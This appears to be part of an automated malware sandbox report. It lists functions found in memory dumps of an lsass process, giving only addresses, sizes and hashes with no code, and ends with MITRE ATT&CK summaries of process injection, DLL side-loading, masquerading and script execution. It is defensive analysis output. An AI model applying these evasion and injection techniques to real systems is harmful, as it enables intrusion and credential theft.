Function 00007FFD9BB180BB Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd31fcdead74af660fe794e82fbce5d8fd2968d9491983c17c02136fd5689d5
Instruction ID: aec023a8fd2fd93f3c49b9da853f337bbda8e0faa6e849149889fb26ee668d60
Opcode Fuzzy Hash: 7dd31fcdead74af660fe794e82fbce5d8fd2968d9491983c17c02136fd5689d5
Instruction Fuzzy Hash: 1F819070615A058FEB1CCF48D4E06B537A1FF49318B5556BCD84A8B69ECB38F992CB80

Function 00007FFD9BEA39DE Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2e4a6d5fac853babbb4fed1c4ae83099819e5c79248b95b88c2f34c0284cb5
Instruction ID: dba5bb3b03f1706f69dc1be1b1b1623c46e9a4786e934b72d20df28b9aa809c5
Opcode Fuzzy Hash: 3f2e4a6d5fac853babbb4fed1c4ae83099819e5c79248b95b88c2f34c0284cb5
Instruction Fuzzy Hash: B4613670A0EA4A8FD35ADFA8D4A05B4B7A4FF15300B1541BAC44EC7AE7DB29BD51C780

Function 00007FFD9BEA5037 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec489763a758f480f4c535443c53cbad224c0e703088abdd78df31be4c71c01
Instruction ID: f88874d5f4791eb1070106dd873ce68f503a4e198220fdcff643a24fefb0f946
Opcode Fuzzy Hash: 0ec489763a758f480f4c535443c53cbad224c0e703088abdd78df31be4c71c01
Instruction Fuzzy Hash: 36513670A0AB0A8FD369CF64D5B4571BBE5FF51304B51557EC48AC7AA2CB3AB842CB40

Function 00007FFD9BB183F0 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a1211ae5c2285f6506c42616a79bbec8b20b7095eb18a0503906d2c4dc36e5
Instruction ID: 3db39ccebad2f220578bd2f33c2599f1a40e0f4dfe877af33d993578df1d1878
Opcode Fuzzy Hash: f3a1211ae5c2285f6506c42616a79bbec8b20b7095eb18a0503906d2c4dc36e5
Instruction Fuzzy Hash: EC410630A1E86E8EEBB8CE588C706B877A1FF54314F1545B9C44ED71E6DD387A858780

Function 00007FFD9BEA5637 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6245c6d53f771bdeec7c90a3a961ee5657bce938a123120910d2cca9e56483c
Instruction ID: 6129ade46b3de4d677875558bd70af123c5920a248dd9bc0f77a25b186f1f8e2
Opcode Fuzzy Hash: f6245c6d53f771bdeec7c90a3a961ee5657bce938a123120910d2cca9e56483c
Instruction Fuzzy Hash: 57414471B0D9488FDF98EF28C4A59A4B7E1FB78324B04456AD44AC75A2DE21E845CB81

Function 00007FFD9BEA0497 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a94dafaf67fe5b92a526d994c26771b4badd7f5f294d9ab10c3f22edf1500535
Instruction ID: 6ac0fcc1bbbe14278b262255691ecd1bd219ea035c8ebcb172155566ee661dd5
Opcode Fuzzy Hash: a94dafaf67fe5b92a526d994c26771b4badd7f5f294d9ab10c3f22edf1500535
Instruction Fuzzy Hash: F941503260D9098FDF98EF18D465DA473E1FFA8320B0505AAE44EC7196DE25FC45CB81

Function 00007FFD9BEA0541 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9d091370a63e9ddccdef3bcc84e2246f8631f947ac58dd61b337335bc789f05
Instruction ID: 918b194f3042889a9ce48c94a3227d7132e632d2865588785767b1339879d820
Opcode Fuzzy Hash: f9d091370a63e9ddccdef3bcc84e2246f8631f947ac58dd61b337335bc789f05
Instruction Fuzzy Hash: 4D315E3260D9488FDF5CEF18C465EA473E1FFA9310B0506AEE45EC7196DE25E845CB81

Function 00007FFD9BEA56E1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52a68b9d68affd7c2af645c2b9dee1a3b244ff4e2421a1816882d4806937754
Instruction ID: 57aaea844f98945e5c28fa0e902b4dbacd9453a5176a06a54cbd361022e192ef
Opcode Fuzzy Hash: c52a68b9d68affd7c2af645c2b9dee1a3b244ff4e2421a1816882d4806937754
Instruction Fuzzy Hash: 3D31867160C9488FDB98EF28C4A5DA477E1FF78324B0846ADD44AC75A2DE21F845CB81

Function 00007FFD9BEA04DB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d97cf4d5499cf9a768fba0c50eb27965c237e82602ece4c3177e61bd6c1289
Instruction ID: 9dfff0f25abb073a2f1d6c24e7e1336136824c0324f50afe1082095a2ebf2377
Opcode Fuzzy Hash: 17d97cf4d5499cf9a768fba0c50eb27965c237e82602ece4c3177e61bd6c1289
Instruction Fuzzy Hash: 1631413260D9498FDF68EF18C465EA473E1FFA8710B0505AEE44EC7196DE25F885CB81

Function 00007FFD9BEA567B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc758fd57ddfc1f1042fa601c594e538781a00464b902af4eb83d4e266abe4fc
Instruction ID: 42fd417d77cb6f652ec17d75603295f93a5c2c9fc1af12c12c0e1b7cf8f1934d
Opcode Fuzzy Hash: dc758fd57ddfc1f1042fa601c594e538781a00464b902af4eb83d4e266abe4fc
Instruction Fuzzy Hash: D5319371B0C9498FDB98EF28C4A5DA4B7E1FF78320B0406ADD44AC75A2DE25F845CB81

Function 00007FFD9BEA279D Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d994f1825e66aa1c7967559a8b335db8cb31a7c21990e254142a755b95d5aad
Instruction ID: 445d29f25ea83ddb46fc71ff95df0811bd19de3c7b5917f632af3510eeced3b6
Opcode Fuzzy Hash: 0d994f1825e66aa1c7967559a8b335db8cb31a7c21990e254142a755b95d5aad
Instruction Fuzzy Hash: A1317271B09A0E5BD754DEA8D4A29B8F7E5FF84314B114239D41ED3691DF24B912CB80

Function 00007FFD9BEA02A5 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14bc2659f3904261ebc1a3299d36560aedc949a46add41c753434c52c85518c
Instruction ID: eaf7ecf8f8f708e2d78d61ba3390858b626b293fd36150bcc485da864f690ecb
Opcode Fuzzy Hash: a14bc2659f3904261ebc1a3299d36560aedc949a46add41c753434c52c85518c
Instruction Fuzzy Hash: 97316E70A1EA4ECFDBA8EF9484615BD77B8FF54701F51017AD00EC21A2DB3A6E448745

Function 00007FFD9BEA2873 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299c531da0289b92e2c4d3b481bd94a7714fae29817026c3468d1da32d597c31
Instruction ID: 301c629010ef2a17c7268dcb03a2fe908b08188e662c93c5fc8ce7231dce6b9c
Opcode Fuzzy Hash: 299c531da0289b92e2c4d3b481bd94a7714fae29817026c3468d1da32d597c31
Instruction Fuzzy Hash: 04212761B0E64D4FEB69A7E898622F8BBD8FF55314F15017DD04DD32E2DA1AA9068340

Function 00007FFD9BEA1732 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06aaf398a37097e242a4bedf0f3adca6a36caab2a017acd911529f8d0967e231
Instruction ID: d5779e646208f80ea610f81898db4520580076f458b8d556c0193aae41735f2d
Opcode Fuzzy Hash: 06aaf398a37097e242a4bedf0f3adca6a36caab2a017acd911529f8d0967e231
Instruction Fuzzy Hash: 2D313A74A0991C9FDF98DB58C865AECB7B5FF59310F0002ADE04EE32A1CE35AA40CB41

Function 00007FFD9BEA545F Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44db29ac3f17607f351c8a5528f571aaea279313c5665ea1f4ec7f1c7d00c830
Instruction ID: 93ea4a5b1af4f4519ee3d648a24d17ec001cdcfff7e9cc1d537b35fd0ff1bc67
Opcode Fuzzy Hash: 44db29ac3f17607f351c8a5528f571aaea279313c5665ea1f4ec7f1c7d00c830
Instruction Fuzzy Hash: EE311CB0A1E90ECFEBA8DB9484625BD76EDFF44301F51047AE41FD21A1DA3A6A409B41

Function 00007FFD9BB157E2 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d420015f722772b00bb32e9f94ae5c8f0faace420246ea5242aefcd7d6e59dc1
Instruction ID: 87b41632c91e4056d1ddadf2b58e2913705614632f1e191147b227aeae8151e6
Opcode Fuzzy Hash: d420015f722772b00bb32e9f94ae5c8f0faace420246ea5242aefcd7d6e59dc1
Instruction Fuzzy Hash: 5F21E875A1991D8FDF98DF58C4A5AECB7B1FF98314F0141AED04EE32A1CA35AA41CB40

Function 00007FFD9BEA4360 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a27ee4ba9616abd9656566aa565270ff697f233e224205219c1f8d2e3ae4a9
Instruction ID: bb8f1cc2f548ba8bf761ae596f648c49945b553171fabcd0ee7c13781be7b16d
Opcode Fuzzy Hash: 15a27ee4ba9616abd9656566aa565270ff697f233e224205219c1f8d2e3ae4a9
Instruction Fuzzy Hash: AB212B50A2E45F8BE338865848744B477BDEF50301B1985BDC44BCB4EBC92DBAC59381

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5641b36d584bf0908415f9703de8b2493836ca9f84ad869f3583b013f5890c52
Instruction ID: 43a0ad75c6292a8c0410512178bcf6d0a609864f92c5adfff7633a8a308eb563
Opcode Fuzzy Hash: 5641b36d584bf0908415f9703de8b2493836ca9f84ad869f3583b013f5890c52
Instruction Fuzzy Hash: F4213832B0D25D8FE732E7A89C250EC7B60EF42325F0541B3D5588B1D3DA382646CB85

Function 00007FFD9BEA0BE8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2269309be3e54af16f4090d2fd9ffecb5b0bd8ed14f84c07edee621db0db76e
Instruction ID: f66ec2e7d5e14ae53d9d34f79e11aaf0c5a3e88c1627f7144f103b6009c15f78
Opcode Fuzzy Hash: c2269309be3e54af16f4090d2fd9ffecb5b0bd8ed14f84c07edee621db0db76e
Instruction Fuzzy Hash: 23215075E1994ECFDB98DB98D8A09ECB7B5FF58300F11017AD00EE72A2DA296D05CB50

Function 00007FFD9BB172EE Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8354f588be070df6dfa2fcb019d33367792fe9e4d7f83ad0dcf74ac57857586
Instruction ID: c685515c7cf8a0d5e5203f0b9b5e8a651c04c902f8ceb563da90258ba2de6ddd
Opcode Fuzzy Hash: b8354f588be070df6dfa2fcb019d33367792fe9e4d7f83ad0dcf74ac57857586
Instruction Fuzzy Hash: 7F01D63231890B8BD718CE58E8647E47790FF95359F60023EDA09C36E1D76AA665C7C0

Function 00007FFD9BB15500 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af7fb3b6fe045cb0f8259f81af8a072f88d0ff53f5ee8d42b4106c24cfcbb2e1
Instruction ID: b8d0ed39363f9f5b4a5a952d1c7294dcd34902a15698dd7a78770e6084e0c84c
Opcode Fuzzy Hash: af7fb3b6fe045cb0f8259f81af8a072f88d0ff53f5ee8d42b4106c24cfcbb2e1
Instruction Fuzzy Hash: EA018422F6F55F86F9785DD8E4313BC55027F44728F57227AE44E860E6DC4C2B8026C2

Function 00007FFD9BB16959 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d265caa0775d3dc333a61829510a1ac668eb4dd7530f57218001817106ebca
Instruction ID: 5e3a708e9cb480f5a3d7b65063f254c82365aef838a31c01efea7d21afbf43ef
Opcode Fuzzy Hash: 09d265caa0775d3dc333a61829510a1ac668eb4dd7530f57218001817106ebca
Instruction Fuzzy Hash: 9501B531B19A5C4FDB58EFE898616ECB7A0FF4A318F11417EE14DD32E7DA2558128740

Function 00007FFD9BEA19CB Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f0cd1a77636b49d09f5a49fe0761dacb917b501cf8ecce9068e5cbcf00cea9
Instruction ID: 6423dcbd837ca7b4b7f1644419505993e6ede3fc8efeeb62af222d8f49fb8214
Opcode Fuzzy Hash: e3f0cd1a77636b49d09f5a49fe0761dacb917b501cf8ecce9068e5cbcf00cea9
Instruction Fuzzy Hash: 1E014B7094894C8FCFA8EB18C8A4BD877B4EBA9315F1401A9D40DE72A1DA31AAC0CB41

Function 00007FFD9BEA19CA Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24915d2245d6da94463c3293378dff4acc8261436a349e17b3fe9854f33970ee
Instruction ID: 27cb7385b66855e5924f2c9490273bc342d44480eb9562d07e8259eba0aed267
Opcode Fuzzy Hash: 24915d2245d6da94463c3293378dff4acc8261436a349e17b3fe9854f33970ee
Instruction Fuzzy Hash: 2901E87094894C8FCF98EF58C8A9BD877B5EB68315F1401A9D40DE72A1DA319A85CB41

Function 00007FFD9BEA3260 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f46da993afa4643ca86479ab5af907316d004d23875b9e2c4eb5709a56ca5b
Instruction ID: 129c1b58470733b070a9dafe293d1cf9d8e4d4077420e27dc59953dc2d0c92bf
Opcode Fuzzy Hash: 77f46da993afa4643ca86479ab5af907316d004d23875b9e2c4eb5709a56ca5b
Instruction Fuzzy Hash: C801283120D64A8FC71ADFA8D8B56E5BB90FF51324F14027ED505C76E1CB6A6654C7C0

Function 00007FFD9BEA1A42 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611bd26d6ab4ab831f0c35118a15265da753d2fabbf034af2387fe41706da087
Instruction ID: 5070d1e6b2dcae76a094dc5e8946e8e1eca50149055df94663671a39818a4809
Opcode Fuzzy Hash: 611bd26d6ab4ab831f0c35118a15265da753d2fabbf034af2387fe41706da087
Instruction Fuzzy Hash: 54F0967154F3C9AFD7228BB088215D93FB8EF43214B1A00F6D495CB0B2C56D5B46C762

Function 00007FFD9BB15B1F Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98428cf9bb6b14e7463d23abe08e582322e34961e14c81e59f63ccb8c21311eb
Instruction ID: 73b4a86db88f93d01207d3ab1dfbe9c691276ab681852a2c59d29c007ba69ee6
Opcode Fuzzy Hash: 98428cf9bb6b14e7463d23abe08e582322e34961e14c81e59f63ccb8c21311eb
Instruction Fuzzy Hash: 94D05E3491E28CDADB31EF9088210FE7B60FF40308F1041A6EA09121E0DB7427189682

Function 00007FFD9BEA323B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
Instruction ID: 5c3836401fa5f36ba66d385df7dbf7d4ed3a959fc71f56cc2a164d6d90b52acd
Opcode Fuzzy Hash: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
Instruction Fuzzy Hash: 08D0C994B0F65F85F13B4AC1407023951AC5F41700E22413DD06F418F1DD1F7B016211

Function 00007FFD9BB172CB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d3b0c94419f0aa7a1afebc210b4fd077754abe23724b7e3fc0e42bddc3ecf3
Instruction ID: 2c63116c29afb7c3fcb5a49dbd375b9c507fc5531fa348240ab973c29507fda7
Opcode Fuzzy Hash: f3d3b0c94419f0aa7a1afebc210b4fd077754abe23724b7e3fc0e42bddc3ecf3
Instruction Fuzzy Hash: EED0C996B0F91F85F1384EC7807023925917F06308E22203EE19F938E5CD1C7B026245

Function 00007FFD9BEA324E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
Instruction ID: 99eb50241774fa0f1a380ac81c14ae6db354a47fe7c29509fe0d03335d3c4524
Opcode Fuzzy Hash: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
Instruction Fuzzy Hash: 0CC08C20A0E28B8FF2374B948035235376CAF42300F2340B9C40E4A8F6CE2A3B019321

Function 00007FFD9BEA274F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9120d7d5d510d60ddd58d7ec11383884db066a8e4b3a30c3828bebc2efdefe9d
Instruction ID: 3c6ca6db2bb23bad56b9c5541718cc6c178af57e2016516e12501095d08f1f63
Opcode Fuzzy Hash: 9120d7d5d510d60ddd58d7ec11383884db066a8e4b3a30c3828bebc2efdefe9d
Instruction Fuzzy Hash: 35C04C80F0E34A66E63515E005A107D07881B16644B5615B1D546651E3E84D6A055611

Function 00007FFD9BB16801 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76afa6dac159f58b6de6f1bd13b16a61611529bb6eaf91ab1794fcb2a5f4d684
Instruction ID: 28ac9d4d89a9889fb72dc93725966bfe67e3fa506c9594b2d613e1c6538f85df
Opcode Fuzzy Hash: 76afa6dac159f58b6de6f1bd13b16a61611529bb6eaf91ab1794fcb2a5f4d684
Instruction Fuzzy Hash: C0B01201F0F20F87F13018F0087007C00402B0434CE125931E20B451F7DC8C3A005190

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

